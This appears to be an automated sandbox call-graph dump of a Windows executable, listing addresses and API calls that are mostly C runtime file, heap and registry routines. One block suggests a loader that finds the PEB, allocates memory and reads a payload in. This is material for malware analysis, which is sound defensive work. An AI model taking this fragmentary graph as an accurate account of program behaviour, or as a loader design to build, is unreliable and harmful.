7639->7620 7640->7638 7642 40c5f5 7641->7642 7643 40c5ea 7641->7643 7645 40c5fd 7642->7645 7651 40c60a 7642->7651 7644 40c4c9 _malloc 66 API calls 7643->7644 7646 40c5f2 7644->7646 7647 408bc0 _free 66 API calls 7645->7647 7646->7638 7649 40c605 _free 7647->7649 7648 40c642 7650 40b343 _malloc DecodePointer 7648->7650 7649->7638 7653 40c648 7650->7653 7651->7648 7652 40c612 HeapReAlloc 7651->7652 7655 40c672 7651->7655 7656 40b343 _malloc DecodePointer 7651->7656 7659 40c65a 7651->7659 7652->7649 7652->7651 7654 40370a __mtinitlocknum 66 API calls 7653->7654 7654->7649 7657 40370a __mtinitlocknum 66 API calls 7655->7657 7656->7651 7658 40c677 GetLastError 7657->7658 7658->7649 7660 40370a __mtinitlocknum 66 API calls 7659->7660 7661 40c65f GetLastError 7660->7661 7661->7649 7665 40a27e LeaveCriticalSection 7662->7665 7664 40673f 7664->7611 7665->7664 7794 4030d1 7666->7794 7668 4025e0 7669 403055 7668->7669 7670 403061 __mtinitlocknum 7669->7670 7671 40306d 7670->7671 7673 403093 7670->7673 7672 40370a __mtinitlocknum 66 API calls 7671->7672 7674 403072 7672->7674 8444 4058af 7673->8444 7676 4036b8 ___strgtold12_l 11 API calls 7674->7676 7681 40307d __mtinitlocknum 7676->7681 7681->7282 7683 402f72 __mtinitlocknum 7682->7683 7684 402f93 7683->7684 7685 402f7e 7683->7685 7686 4058af __lock_file 67 API calls 7684->7686 7687 40370a __mtinitlocknum 66 API calls 7685->7687 7688 402f9b 7686->7688 7689 402f83 7687->7689 7690 402dd2 __ftell_nolock 71 API calls 7688->7690 7691 4036b8 ___strgtold12_l 11 API calls 7689->7691 7692 402fa8 7690->7692 7694 402f8e __mtinitlocknum 7691->7694 8524 402fc1 7692->8524 7694->7285 8527 402d27 7695->8527 7697 402617 7698 48125d 7697->7698 7703 480f9c 7697->7703 7699 481264 7698->7699 7700 481270 7699->7700 7702 4815ab ExitProcess 7699->7702 8623 4808ef 7699->8623 7700->7275 8711 48005f GetPEB 7703->8711 7705 48110b 8712 480f1d 7705->8712 7707 481113 7708 4811c1 7707->7708 8725 480422 7707->8725 7708->7275 7711 481221 VirtualAlloc ReadFile 7711->7708 7714 481257 7711->7714 7712 481270 7712->7275 7713 4808ef 15 API calls 7713->7714 7714->7712 7714->7713 7715 4815ab ExitProcess 7714->7715 7717 401511 GetSystemMetrics 7716->7717 8771 402ac0 7717->8771 7721 401610 RegQueryValueExW 7723 401644 RegQueryValueExW 7721->7723 7724 401637 7721->7724 7722 401ab7 7722->7281 7725 401662 7723->7725 7726 40166f RegQueryValueExW 7723->7726 7724->7723 7725->7726 7727 40169a RegQueryValueExW 7726->7727 7728 40168d 7726->7728 7729 4016c3 RegQueryValueExW 7727->7729 7730 4016b8 7727->7730 7728->7727 7731 4016e1 7729->7731 7732 4016ec RegQueryValueExW 7729->7732 7730->7729 7731->7732 7733 401717 RegQueryValueExW 7732->7733 7734 40170a 7732->7734 7735 401742 RegQueryValueExW 7733->7735 7736 401735 7733->7736 7734->7733 7737 401760 7735->7737 7738 40176d RegQueryValueExW 7735->7738 7736->7735 7737->7738 7739 401798 RegQueryValueExW 7738->7739 7740 40178b 7738->7740 7741 4017c3 RegQueryValueExW 7739->7741 7742 4017b6 7739->7742 7740->7739 7743 4017e1 7741->7743 7744 4017ee RegQueryValueExW 7741->7744 7742->7741 7743->7744 7745 401819 RegQueryValueExW 7744->7745 7746 40180c 7744->7746 7747 401844 RegQueryValueExW 7745->7747 7748 401837 7745->7748 7746->7745 7749 401862 7747->7749 7750 40186f RegQueryValueExW 7747->7750 7748->7747 7749->7750 7751 40189a RegQueryValueExW 7750->7751 7752 40188d 7750->7752 7753 4018c5 RegQueryValueExW 7751->7753 7754 4018b8 7751->7754 7752->7751 7755 4018f0 RegQueryValueExW 7753->7755 7756 4018e3 7753->7756 7754->7753 7757 40191b RegQueryValueExW 7755->7757 7758 40190e 7755->7758 7756->7755 7759 401946 RegQueryValueExW 7757->7759 7760 401939 7757->7760 7758->7757 7761 401971 RegQueryValueExW 7759->7761 7762 401964 7759->7762 7760->7759 7763 40199c RegQueryValueExW 7761->7763 7764 40198f 7761->7764 7762->7761 7765 4019d4 7763->7765 7766 4019fa RegQueryValueExW 7763->7766 7764->7763 7765->7766 8773 401051 RegOpenKeyW 7765->8773 7767 401a37 RegQueryValueExW 7766->7767 7768 401a1f 7766->7768 7771 401a75 RegQueryValueExW 7767->7771 7772 401a5d 7767->7772 7768->7767 7770 401a25 lstrcpyW 7768->7770 7770->7767 7773 401a96 7771->7773 7774 401aae RegCloseKey 7771->7774 7772->7771 7776 401a63 lstrcpyW 7772->7776 7773->7774 7777 401a9c lstrcpyW 7773->7777 7774->7722 7776->7771 7777->7774 7778->7297 7781 401fad 7779->7781 7780 4020c5 LoadAcceleratorsW 7780->7301 7781->7780 7782 402066 lstrlenW lstrcpynW lstrcatW 7781->7782 7783 4020a8 InvalidateRect 7781->7783 7784 4020a4 7782->7784 7783->7780 7784->7783 7786 4020cc 7784->7786 8778 401f1c LoadStringW wsprintfW LoadStringW MessageBoxW 7786->8778 7788 4020d8 7789 4020dc 7788->7789 7790 40211f DestroyWindow 7788->7790 7789->7780 8779 40101c lstrcpyW GetFileTitleW 7789->8779 7790->7780 7792 4020f0 CreateFileW 7792->7780 7793 402111 CloseHandle 7792->7793 7793->7780 7797 4030dd __mtinitlocknum 7794->7797 7795 4030f0 7796 40370a __mtinitlocknum 66 API calls 7795->7796 7798 4030f5 7796->7798 7797->7795 7799 40311e 7797->7799 7800 4036b8 ___strgtold12_l 11 API calls 7798->7800 7813 406359 7799->7813 7812 403100 __mtinitlocknum @_EH4_CallFilterFunc@8 7800->7812 7802 403123 7803 403137 7802->7803 7804 40312a 7802->7804 7806 40315f 7803->7806 7807 40313f 7803->7807 7805 40370a __mtinitlocknum 66 API calls 7804->7805 7805->7812 7830 4060a0 7806->7830 7808 40370a __mtinitlocknum 66 API calls 7807->7808 7808->7812 7812->7668 7814 406365 __mtinitlocknum 7813->7814 7815 40a357 __lock 66 API calls 7814->7815 7828 406373 7815->7828 7816 4063e8 7853 406483 7816->7853 7817 4063ef 7818 408bfa __malloc_crt 66 API calls 7817->7818 7820 4063f6 7818->7820 7820->7816 7822 406404 InitializeCriticalSectionAndSpinCount 7820->7822 7821 406478 __mtinitlocknum 7821->7802 7823 406424 7822->7823 7824 406437 EnterCriticalSection 7822->7824 7827 408bc0 _free 66 API calls 7823->7827 7824->7816 7825 40a295 __mtinitlocknum 66 API calls 7825->7828 7827->7816 7828->7816 7828->7817 7828->7825 7856 4058f0 7828->7856 7861 40595e 7828->7861 7831 4060c2 7830->7831 7832 4060dd 7831->7832 7844 4060f4 __wopenfile 7831->7844 7833 40370a __mtinitlocknum 66 API calls 7832->7833 7835 4060e2 7833->7835 7834 4062a9 7837 406302 7834->7837 7838 406314 7834->7838 7836 4036b8 ___strgtold12_l 11 API calls 7835->7836 7842 40316a 7836->7842 7839 40370a __mtinitlocknum 66 API calls 7837->7839 7868 40adae 7838->7868 7841 406307 7839->7841 7843 4036b8 ___strgtold12_l 11 API calls 7841->7843 7850 403185 7842->7850 7843->7842 7844->7834 7844->7837 7844->7844 7871 40aeb3 7844->7871 7847 40aeb3 __wcsnicmp 78 API calls 7848 4062c1 7847->7848 7848->7834 7849 40aeb3 __wcsnicmp 78 API calls 7848->7849 7849->7834 8437 405922 7850->8437 7852 40318d 7852->7812 7866 40a27e LeaveCriticalSection 7853->7866 7855 40648a 7855->7821 7857 405913 EnterCriticalSection 7856->7857 7858 4058fd 7856->7858 7857->7828 7859 40a357 __lock 66 API calls 7858->7859 7860 405906 7859->7860 7860->7828 7862 405981 LeaveCriticalSection 7861->7862 7863 40596e 7861->7863 7862->7828 7867 40a27e LeaveCriticalSection 7863->7867 7865 40597e 7865->7828 7866->7855 7867->7865 7879 40acea 7868->7879 7870 40adc9 7870->7842 7872 40aec2 7871->7872 7873 40af3b 7871->7873 7875 40370a __mtinitlocknum 66 API calls 7872->7875 7878 4062a2 7872->7878 8327 40adce 7873->8327 7876 40aed9 7875->7876 7877 4036b8 ___strgtold12_l 11 API calls 7876->7877 7877->7878 7878->7834 7878->7847 7880 40acf6 __mtinitlocknum 7879->7880 7881 40ad09 7880->7881 7884 40ad3f 7880->7884 7882 40370a __mtinitlocknum 66 API calls 7881->7882 7883 40ad0e 7882->7883 7886 4036b8 ___strgtold12_l 11 API calls 7883->7886 7890 40a5b5 7884->7890 7889 40ad18 __mtinitlocknum 7886->7889 7887 40ad59 7997 40ad80 7887->7997 7889->7870 7891 40a5dc 7890->7891 8001 40ec04 7891->8001 7893 403666 __invoke_watson 10 API calls 7896 40ace9 __mtinitlocknum 7893->7896 7894 40a692 7907 40a719 7894->7907 7916 40a6ec 7894->7916 7895 40a637 8026 40371d 7895->8026 7899 40ad09 7896->7899 7905 40ad3f 7896->7905 7898 40a5f8 7898->7894 7898->7895 7943 40a867 7898->7943 7901 40370a __mtinitlocknum 66 API calls 7899->7901 7903 40ad0e 7901->7903 7902 40370a __mtinitlocknum 66 API calls 7904 40a646 7902->7904 7908 4036b8 ___strgtold12_l 11 API calls 7903->7908 7909 4036b8 ___strgtold12_l 11 API calls 7904->7909 7906 40a5b5 __tsopen_nolock 120 API calls 7905->7906 7910 40ad59 7906->7910 7911 40371d __write 66 API calls 7907->7911 7915 40ad18 __mtinitlocknum 7908->7915 7921 40a650 7909->7921 7912 40ad80 __wsopen_helper LeaveCriticalSection 7910->7912 7913 40a71e 7911->7913 7912->7915 7914 40370a __mtinitlocknum 66 API calls 7913->7914 7917 40a728 7914->7917 7915->7887 8008 409c3d 7916->8008 7919 4036b8 ___strgtold12_l 11 API calls 7917->7919 7919->7921 7920 40a7aa 7922 40a7b3 7920->7922 7923 40a7d4 CreateFileW 7920->7923 7921->7887 7924 40371d __write 66 API calls 7922->7924 7925 40a871 GetFileType 7923->7925 7926 40a801 7923->7926 7927 40a7b8 7924->7927 7928 40a8c2 7925->7928 7929 40a87e GetLastError 7925->7929 7930 40a83a GetLastError 7926->7930 7933 40a815 CreateFileW 7926->7933 7931 40370a __mtinitlocknum 66 API calls 7927->7931 8034 409a07 7928->8034 7932 403730 __dosmaperr 66 API calls 7929->7932 8029 403730 7930->8029 7935 40a7c2 7931->7935 7936 40a8a7 CloseHandle 7932->7936 7933->7925 7933->7930 7938 40370a __mtinitlocknum 66 API calls 7935->7938 7937 40a861 7936->7937 7939 40a8b5 7936->7939 7941 40370a __mtinitlocknum 66 API calls 7937->7941 7938->7921 7942 40370a __mtinitlocknum 66 API calls 7939->7942 7941->7943 7944 40a8ba 7942->7944 7943->7893 7944->7937 7945 40aaf7 7945->7943 7948 40ac5f CloseHandle CreateFileW 7945->7948 7951 40ab6b 7948->7951 7952 40ac8c GetLastError 7948->7952 7950 40a94e 7950->7945 7959 40ab00 7950->7959 7962 40a956 7950->7962 7971 40aa50 7950->7971 7951->7943 7955 403730 __dosmaperr 66 API calls 7952->7955 7953 40a962 8068 405090 7953->8068 7954 40a949 7956 40371d __write 66 API calls 7954->7956 7958 40ac98 7955->7958 7956->7950 8203 409a88 7958->8203 7959->7945 7970 40ab1d 7959->7970 7975 40aa74 7959->7975 8053 40e9e9 7962->8053 7963 40aac8 7967 405090 __read_nolock 76 API calls 7963->7967 7964 40a994 7966 405dc4 __lseek_nolock 68 API calls 7964->7966 7965 40a981 8137 40e833 7965->8137 7966->7950 7983 40aad5 7967->7983 7973 407626 __lseeki64_nolock 68 API calls 7970->7973 7971->7945 7971->7963 7971->7975 7976 40aa9f 7971->7976 7974 40ab28 7973->7974 7974->7975 7978 40ab33 7974->7978 7975->7945 7975->7962 8178 407e92 7975->8178 8168 407626 7976->8168 7986 407626 __lseeki64_nolock 68 API calls 7978->7986 7980 40ab78 7982 40ab9a 7980->7982 7984 40ab7f 7980->7984 7981 40ab5e 7988 40e9e9 __close_nolock 69 API calls 7981->7988 7987 405dc4 __lseek_nolock 68 API calls 7982->7987 7983->7945 7983->7962 7983->7980 7983->7981 7983->7982 7989 405dc4 __lseek_nolock 68 API calls 7984->7989 7991 40ab3d 7986->7991 7993 40ab42 7987->7993 7992 40ab65 7988->7992 7989->7993 7990 40aab1 7994 407626 __lseeki64_nolock 68 API calls 7990->7994 7991->7993 7995 40370a __mtinitlocknum 66 API calls 7992->7995 7993->7945 7993->7962 7996 40aabb 7994->7996 7995->7951 7996->7962 7996->7963 7998 40ad85 7997->7998 7999 40adac 7997->7999 8326 409c16 LeaveCriticalSection 7998->8326 7999->7889 8002 40ec10 8001->8002 8003 40ec25 8001->8003 8004 40370a __mtinitlocknum 66 API calls 8002->8004 8003->7898 8005 40ec15 8004->8005 8006 4036b8 ___strgtold12_l 11 API calls 8005->8006 8007 40ec20 8006->8007 8007->7898 8009 409c49 __mtinitlocknum 8008->8009 8010 40a295 __mtinitlocknum 66 API calls 8009->8010 8011 409c59 8010->8011 8012 40a357 __lock 66 API calls 8011->8012 8013 409c5e __mtinitlocknum 8011->8013 8023 409c6d 8012->8023 8013->7920 8014 409daf 8225 409dcd 8014->8225 8016 409d45 8017 408c3f __calloc_crt 66 API calls 8016->8017 8020 409d4e 8017->8020 8018 409ced EnterCriticalSection 8021 409cfd LeaveCriticalSection 8018->8021 8018->8023 8019 40a357 __lock 66 API calls 8019->8023 8020->8014 8215 409b77 8020->8215 8021->8023 8022 409cc3 InitializeCriticalSectionAndSpinCount 8022->8023 8023->8014 8023->8016 8023->8018 8023->8019 8023->8022 8212 409d0f 8023->8212 8027 407230 __getptd_noexit 66 API calls 8026->8027 8028 403722 8027->8028 8028->7902 8030 40371d __write 66 API calls 8029->8030 8031 40373b _free 8030->8031 8032 40370a __mtinitlocknum 66 API calls 8031->8032 8033 40374e 8032->8033 8033->7937 8035 409a15 8034->8035 8036 409a6e 8034->8036 8035->8036 8039 409a39 8035->8039 8037 40370a __mtinitlocknum 66 API calls 8036->8037 8038 409a73 8037->8038 8040 40371d __write 66 API calls 8038->8040 8041 409a64 8039->8041 8042 409a5e SetStdHandle 8039->8042 8040->8041 8041->7945 8041->7950 8043 405dc4 8041->8043 8042->8041 8233 409b0e 8043->8233 8045 405dd3 8046 405de9 SetFilePointer 8045->8046 8047 405dd9 8045->8047 8049 405e00 GetLastError 8046->8049 8050 405e08 8046->8050 8048 40370a __mtinitlocknum 66 API calls 8047->8048 8051 405dde 8048->8051 8049->8050 8050->8051 8052 403730 __dosmaperr 66 API calls 8050->8052 8051->7953 8051->7954 8052->8051 8054 409b0e __commit 66 API calls 8053->8054 8056 40e9f9 8054->8056 8055 40ea4f 8058 409a88 __free_osfhnd 67 API calls 8055->8058 8056->8055 8057 40ea2d 8056->8057 8060 409b0e __commit 66 API calls 8056->8060 8057->8055 8061 409b0e __commit 66 API calls 8057->8061 8059 40ea57 8058->8059 8062 40ea79 8059->8062 8065 403730 __dosmaperr 66 API calls 8059->8065 8063 40ea24 8060->8063 8064 40ea39 CloseHandle 8061->8064 8062->7944 8066 409b0e __commit 66 API calls 8063->8066 8064->8055 8067 40ea45 GetLastError 8064->8067 8065->8062 8066->8057 8067->8055 8069 4050c7 8068->8069 8070 4050ac 8068->8070 8072 4050d6 8069->8072 8074 4050f5 8069->8074 8071 40371d __write 66 API calls 8070->8071 8073 4050b1 8071->8073 8075 40371d __write 66 API calls 8072->8075 8077 40370a __mtinitlocknum 66 API calls 8073->8077 8076 405113 8074->8076 8091 405127 8074->8091 8078 4050db 8075->8078 8079 40371d __write 66 API calls 8076->8079 8080 4050b9 8077->8080 8082 40370a __mtinitlocknum 66 API calls 8078->8082 8084 405118 8079->8084 8080->7964 8080->7965 8081 40517d 8083 40371d __write 66 API calls 8081->8083 8085 4050e2 8082->8085 8086 405182 8083->8086 8087 40370a __mtinitlocknum 66 API calls 8084->8087 8088 4036b8 ___strgtold12_l 11 API calls 8085->8088 8089 40370a __mtinitlocknum 66 API calls 8086->8089 8090 40511f 8087->8090 8088->8080 8089->8090 8094 4036b8 ___strgtold12_l 11 API calls 8090->8094 8091->8080 8091->8081 8092 40515c 8091->8092 8093 405196 8091->8093 8092->8081 8095 405167 ReadFile 8092->8095 8097 408bfa __malloc_crt 66 API calls 8093->8097 8094->8080 8098 40560a GetLastError 8095->8098 8100 405292 8095->8100 8099 4051ac 8097->8099 8101 405617 8098->8101 8102 405491 8098->8102 8103 4051d4 8099->8103 8104 4051b6 8099->8104 8100->8098 8105 4052a6 8100->8105 8107 40370a __mtinitlocknum 66 API calls 8101->8107 8109 403730 __dosmaperr 66 API calls 8102->8109 8116 405416 8102->8116 8106 407626 __lseeki64_nolock 68 API calls 8103->8106 8108 40370a __mtinitlocknum 66 API calls 8104->8108 8105->8116 8118 4054d6 8105->8118 8120 4052c2 8105->8120 8111 4051e2 8106->8111 8112 40561c 8107->8112 8110 4051bb 8108->8110 8109->8116 8113 40371d __write 66 API calls 8110->8113 8111->8095 8114 40371d __write 66 API calls 8112->8114 8113->8080 8114->8116 8115 408bc0 _free 66 API calls 8115->8080 8116->8080 8116->8115 8117 40554b ReadFile 8122 40556a GetLastError 8117->8122 8130 405574 8117->8130 8118->8116 8118->8117 8119 405326 ReadFile 8121 405344 GetLastError 8119->8121 8129 40534e 8119->8129 8120->8119 8125 4053a3 8120->8125 8121->8120 8121->8129 8122->8118 8122->8130 8123 405467 MultiByteToWideChar 8123->8116 8124 40548b GetLastError 8123->8124 8124->8102 8125->8116 8126 405411 8125->8126 8127 40541e 8125->8127 8132 4053db 8125->8132 8128 40370a __mtinitlocknum 66 API calls 8126->8128 8127->8132 8133 405455 8127->8133 8128->8116 8129->8120 8134 407626 __lseeki64_nolock 68 API calls 8129->8134 8130->8118 8131 407626 __lseeki64_nolock 68 API calls 8130->8131 8131->8130 8132->8123 8135 407626 __lseeki64_nolock 68 API calls 8133->8135 8134->8129 8136 405464 8135->8136 8136->8123 8138 407626 __lseeki64_nolock 68 API calls 8137->8138 8139 40e852 8138->8139 8140 40e8b5 8139->8140 8141 407626 __lseeki64_nolock 68 API calls 8139->8141 8142 40370a __mtinitlocknum 66 API calls 8140->8142 8143 40a98d 8140->8143 8146 40e86e 8141->8146 8142->8143 8143->7962 8143->7964 8144 40e950 8147 40e9b9 8144->8147 8151 407626 __lseeki64_nolock 68 API calls 8144->8151 8145 40e894 GetProcessHeap HeapAlloc 8148 40e8b0 8145->8148 8158 40e8c7 __setmode_nolock 8145->8158 8146->8140 8146->8144 8146->8145 8147->8140 8149 407626 __lseeki64_nolock 68 API calls 8147->8149 8150 40370a __mtinitlocknum 66 API calls 8148->8150 8149->8140 8150->8140 8152 40e969 8151->8152 8152->8140 8153 409b0e __commit 66 API calls 8152->8153 8154 40e97f SetEndOfFile 8153->8154 8154->8147 8155 40e99c 8154->8155 8157 40370a __mtinitlocknum 66 API calls 8155->8157 8159 40e9a1 8157->8159 8160 40e933 8158->8160 8167 40e90a __setmode_nolock 8158->8167 8246 407795 8158->8246 8162 40371d __write 66 API calls 8159->8162 8161 40371d __write 66 API calls 8160->8161 8163 40e938 8161->8163 8164 40e9ac GetLastError 8162->8164 8165 40370a __mtinitlocknum 66 API calls 8163->8165 8163->8167 8164->8147 8165->8167 8166 40e918 GetProcessHeap HeapFree 8166->8147 8167->8166 8169 409b0e __commit 66 API calls 8168->8169 8170 407644 8169->8170 8171 40764c 8170->8171 8172 40765d SetFilePointer 8170->8172 8173 40370a __mtinitlocknum 66 API calls 8171->8173 8174 407675 GetLastError 8172->8174 8175 407651 8172->8175 8173->8175 8174->8175 8176 40767f 8174->8176 8175->7975 8175->7990 8177 403730 __dosmaperr 66 API calls 8176->8177 8177->8175 8179 407e9e __mtinitlocknum 8178->8179 8180 407ec1 8179->8180 8181 407ea6 8179->8181 8183 407ecd 8180->8183 8186 407f07 8180->8186 8182 40371d __write 66 API calls 8181->8182 8184 407eab 8182->8184 8185 40371d __write 66 API calls 8183->8185 8187 40370a __mtinitlocknum 66 API calls 8184->8187 8188 407ed2 8185->8188 8189 409b77 ___lock_fhandle 68 API calls 8186->8189 8196 407eb3 __mtinitlocknum 8187->8196 8190 40370a __mtinitlocknum 66 API calls 8188->8190 8191 407f0d 8189->8191 8192 407eda 8190->8192 8193 407f1b 8191->8193 8194 407f2f 8191->8194 8195 4036b8 ___strgtold12_l 11 API calls 8192->8195 8197 407795 __write_nolock 94 API calls 8193->8197 8198 40370a __mtinitlocknum 66 API calls 8194->8198 8195->8196 8196->7975 8199 407f27 8197->8199 8200 407f34 8198->8200 8322 407f5e 8199->8322 8201 40371d __write 66 API calls 8200->8201 8201->8199 8204 409af4 8203->8204 8205 409a99 8203->8205 8206 40370a __mtinitlocknum 66 API calls 8204->8206 8205->8204 8211 409ac4 8205->8211 8207 409af9 8206->8207 8208 40371d __write 66 API calls 8207->8208 8209 409aea 8208->8209 8209->7951 8210 409ae4 SetStdHandle 8210->8209 8211->8209 8211->8210 8228 40a27e LeaveCriticalSection 8212->8228 8214 409d16 8214->8023 8216 409b83 __mtinitlocknum 8215->8216 8217 409bdd 8216->8217 8219 40a357 __lock 66 API calls 8216->8219 8218 409be2 EnterCriticalSection 8217->8218 8221 409bff __mtinitlocknum 8217->8221 8218->8221 8220 409baf 8219->8220 8222 409bcb 8220->8222 8223 409bb8 InitializeCriticalSectionAndSpinCount 8220->8223 8221->8014 8229 409c0d 8222->8229 8223->8222 8232 40a27e LeaveCriticalSection 8225->8232 8227 409dd4 8227->8013 8228->8214 8230 40a27e _doexit LeaveCriticalSection 8229->8230 8231 409c14 8230->8231 8231->8217 8232->8227 8234 409b33 8233->8234 8235 409b1b 8233->8235 8238 40371d __write 66 API calls 8234->8238 8239 409b72 8234->8239 8236 40371d __write 66 API calls 8235->8236 8237 409b20 8236->8237 8240 40370a __mtinitlocknum 66 API calls 8237->8240 8241 409b44 8238->8241 8239->8045 8245 409b28 8240->8245 8242 40370a __mtinitlocknum 66 API calls 8241->8242 8243 409b4c 8242->8243 8244 4036b8 ___strgtold12_l 11 API calls 8243->8244 8244->8245 8245->8045 8247 4077a4 __write_nolock 8246->8247 8248 4077f9 8247->8248 8249 4077da 8247->8249 8279 4077cf 8247->8279 8253 407855 8248->8253 8254 407838 8248->8254 8251 40371d __write 66 API calls 8249->8251 8250 40800d __ld12tod 5 API calls 8252 407e90 8250->8252 8255 4077df 8251->8255 8252->8158 8257 407868 8253->8257 8261 407626 __lseeki64_nolock 68 API calls 8253->8261 8256 40371d __write 66 API calls 8254->8256 8258 40370a __mtinitlocknum 66 API calls 8255->8258 8260 40783d 8256->8260 8305 407faf 8257->8305 8262 4077e6 8258->8262 8265 40370a __mtinitlocknum 66 API calls 8260->8265 8261->8257 8263 4036b8 ___strgtold12_l 11 API calls 8262->8263 8263->8279 8264 407871 8266 407b13 8264->8266 8314 4072a9 8264->8314 8267 407845 8265->8267 8269 407b22 8266->8269 8270 407dc3 WriteFile 8266->8270 8268 4036b8 ___strgtold12_l 11 API calls 8267->8268 8268->8279 8272 407bdd 8269->8272 8280 407b35 8269->8280 8274 407af5 8270->8274 8275 407df6 GetLastError 8270->8275 8284 407bea 8272->8284 8295 407cb7 8272->8295 8276 407e41 8274->8276 8274->8279 8283 407e14 8274->8283 8275->8274 8276->8279 8282 40370a __mtinitlocknum 66 API calls 8276->8282 8277 4078b5 8277->8266 8278 4078c5 GetConsoleCP 8277->8278 8278->8274 8302 4078e8 8278->8302 8279->8250 8280->8274 8280->8276 8281 407b7f WriteFile 8280->8281 8281->8275 8281->8280 8286 407e64 8282->8286 8288 407e33 8283->8288 8289 407e1f 8283->8289 8284->8274 8284->8276 8285 407c59 WriteFile 8284->8285 8285->8275 8285->8284 8292 40371d __write 66 API calls 8286->8292 8287 407d28 WideCharToMultiByte 8287->8275 8290 407d5f WriteFile 8287->8290 8291 403730 __dosmaperr 66 API calls 8288->8291 8293 40370a __mtinitlocknum 66 API calls 8289->8293 8294 407d96 GetLastError 8290->8294 8290->8295 8291->8279 8292->8279 8296 407e24 8293->8296 8294->8295 8295->8274 8295->8276 8295->8287 8295->8290 8297 40371d __write 66 API calls 8296->8297 8297->8279 8299 407994 WideCharToMultiByte 8299->8274 8301 4079c5 WriteFile 8299->8301 8300 408e91 78 API calls __fassign 8300->8302 8301->8275 8301->8302 8302->8274 8302->8275 8302->8299 8302->8300 8303 40b810 WriteConsoleW CreateFileW __write_nolock 8302->8303 8304 407a19 WriteFile 8302->8304 8319 408ee3 8302->8319 8303->8302 8304->8275 8304->8302 8306 407fcb 8305->8306 8307 407fbc 8305->8307 8309 407fe9 8306->8309 8310 40370a __mtinitlocknum 66 API calls 8306->8310 8308 40370a __mtinitlocknum 66 API calls 8307->8308 8313 407fc1 8308->8313 8309->8264 8311 407fdc 8310->8311 8312 4036b8 ___strgtold12_l 11 API calls 8311->8312 8312->8313 8313->8264 8315 407230 __getptd_noexit 66 API calls 8314->8315 8316 4072b1 8315->8316 8317 4072be GetConsoleMode 8316->8317 8318 4069b9 __amsg_exit 66 API calls 8316->8318 8317->8266 8317->8277 8318->8317 8320 408eab __isleadbyte_l 76 API calls 8319->8320 8321 408ef2 8320->8321 8321->8302 8325 409c16 LeaveCriticalSection 8322->8325 8324 407f64 8324->8196 8325->8324 8326->7999 8328 40ade3 8327->8328 8336 40adfa 8327->8336 8329 40adea 8328->8329 8331 40ae0b 8328->8331 8330 40370a __mtinitlocknum 66 API calls 8329->8330 8332 40adef 8330->8332 8338 403753 8331->8338 8334 4036b8 ___strgtold12_l 11 API calls 8332->8334 8334->8336 8335 40ec31 78 API calls __towlower_l 8337 40ae17 8335->8337 8336->7878 8337->8335 8337->8336 8339 403766 8338->8339 8345 4037b3 8338->8345 8340 4072a9 __getptd 66 API calls 8339->8340 8341 40376b 8340->8341 8342 403793 8341->8342 8346 4089c0 8341->8346 8342->8345 8361 40823f 8342->8361 8345->8337 8347 4089cc __mtinitlocknum 8346->8347 8348 4072a9 __getptd 66 API calls 8347->8348 8349 4089d1 8348->8349 8350 4089ff 8349->8350 8352 4089e3 8349->8352 8351 40a357 __lock 66 API calls 8350->8351 8353 408a06 8351->8353 8354 4072a9 __getptd 66 API calls 8352->8354 8377 408973 8353->8377 8356 4089e8 8354->8356 8359 4089f6 __mtinitlocknum 8356->8359 8360 4069b9 __amsg_exit 66 API calls 8356->8360 8359->8342 8360->8359 8362 40824b __mtinitlocknum 8361->8362 8363 4072a9 __getptd 66 API calls 8362->8363 8364 408250 8363->8364 8365 408262 8364->8365 8366 40a357 __lock 66 API calls 8364->8366 8368 408270 __mtinitlocknum 8365->8368 8370 4069b9 __amsg_exit 66 API calls 8365->8370 8367 408280 8366->8367 8369 4082c9 8367->8369 8372 4082b1 InterlockedIncrement 8367->8372 8373 408297 InterlockedDecrement 8367->8373 8368->8345 8433 4082da 8369->8433 8370->8368 8372->8369 8373->8372 8374 4082a2 8373->8374 8374->8372 8375 408bc0 _free 66 API calls 8374->8375 8376 4082b0 8375->8376 8376->8372 8378 408980 8377->8378 8379 4089b5 8377->8379 8378->8379 8380 408700 ___addlocaleref 8 API calls 8378->8380 8385 408a2d 8379->8385 8381 408996 8380->8381 8381->8379 8388 40878f 8381->8388 8432 40a27e LeaveCriticalSection 8385->8432 8387 408a34 8387->8356 8389 4087a0 InterlockedDecrement 8388->8389 8390 408823 8388->8390 8391 4087b5 InterlockedDecrement 8389->8391 8392 4087b8 8389->8392 8390->8379 8402 408828 8390->8402 8391->8392 8393 4087c2 InterlockedDecrement 8392->8393 8394 4087c5 8392->8394 8393->8394 8395 4087d2 8394->8395 8396 4087cf InterlockedDecrement 8394->8396 8397 4087dc InterlockedDecrement 8395->8397 8399 4087df 8395->8399 8396->8395 8397->8399 8398 4087f8 InterlockedDecrement 8398->8399 8399->8398 8400 408808 InterlockedDecrement 8399->8400 8401 408813 InterlockedDecrement 8399->8401 8400->8399 8401->8390 8408 40883f 8402->8408 8431 4088ac 8402->8431 8403 4088f9 8406 40bd05 ___free_lc_time 66 API calls 8403->8406 8422 408922 8403->8422 8404 408bc0 _free 66 API calls 8405 4088cd 8404->8405 8409 408bc0 _free 66 API calls 8405->8409 8411 408917 8406->8411 8407 408873 8410 408894 8407->8410 8421 408bc0 _free 66 API calls 8407->8421 8408->8407 8416 408bc0 _free 66 API calls 8408->8416 8408->8431 8412 4088e0 8409->8412 8413 408bc0 _free 66 API calls 8410->8413 8415 408bc0 _free 66 API calls 8411->8415 8419 408bc0 _free 66 API calls 8412->8419 8423 4088a1 8413->8423 8414 408967 8417 408bc0 _free 66 API calls 8414->8417 8415->8422 8418 408868 8416->8418 8424 40896d 8417->8424 8425 40c0e5 ___free_lconv_mon 66 API calls 8418->8425 8426 4088ee 8419->8426 8420 408bc0 66 API calls _free 8420->8422 8427 408889 8421->8427 8422->8414 8422->8420 8428 408bc0 _free 66 API calls 8423->8428 8424->8379 8425->8407 8429 408bc0 _free 66 API calls 8426->8429 8430 40c07c ___free_lconv_num 66 API calls 8427->8430 8428->8431 8429->8403 8430->8410 8431->8403 8431->8404 8432->8387 8436 40a27e LeaveCriticalSection 8433->8436 8435 4082e1 8435->8365 8436->8435 8438 405952 LeaveCriticalSection 8437->8438 8439 405933 8437->8439 8438->7852 8439->8438 8440 40593a 8439->8440 8443 40a27e LeaveCriticalSection 8440->8443 8442 40594f 8442->7852 8443->8442 8445 4058c1 8444->8445 8446 4058e3 EnterCriticalSection 8444->8446 8445->8446 8447 4058c9 8445->8447 8449 40309b 8446->8449 8448 40a357 __lock 66 API calls 8447->8448 8448->8449 8450 402fcb 8449->8450 8451 402feb 8450->8451 8452 402fdb 8450->8452 8454 402ffd 8451->8454 8503 402dd2 8451->8503 8453 40370a 